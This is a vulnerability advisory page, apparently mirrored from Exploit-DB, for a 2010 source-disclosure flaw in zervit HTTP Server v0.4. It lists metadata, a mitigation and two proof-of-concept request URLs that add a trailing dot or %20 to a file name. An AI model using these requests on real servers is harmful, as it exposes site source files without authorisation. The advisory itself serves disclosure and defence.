zervit Web Server v0.4 Source Disclosure/Download

vendor:

zervit HTTP Server

by:

Dr_IDE

4,3

CVSS

MEDIUM

Source Disclosure

200

CWE

Product Name: zervit HTTP Server

Affected Version From: v0.4

Affected Version To: v0.4

Patch Exists: NO

Related CWE: N/A

CPE: a:zervit:zervit_http_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7

2010

zervit Web Server v0.4 Source Disclosure/Download

zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest version of the application available. zervit HTTP Server is vulnerable to common remote source disclosure attacks.

Mitigation:

Disable directory listing and ensure that all files are properly secured.

Source

Exploit-DB raw data:

###################################################################
#
# zervit Web Server v0.4 Source Disclosure/Download
# Found By:	Dr_IDE
# Date: 	May 12, 2010
# Download:	http://zervit.sourceforge.net/
# Tested on:	Windows 7
#
###################################################################

- Description -

zervit HTTP Server v0.4 is a Windows based HTTP server. This is the latest
version of the application available.

zervit HTTP Server is vulnerable to common remote source disclosure attacks. 

- Technical Details - (This is with Directory Listing = On or Off)

http://[ webserver IP][:port]index.html.		(Source Download)
http://[ webserver IP][:port]index.html%20		(Source Download)


#[pocoftheday.blogspot.com]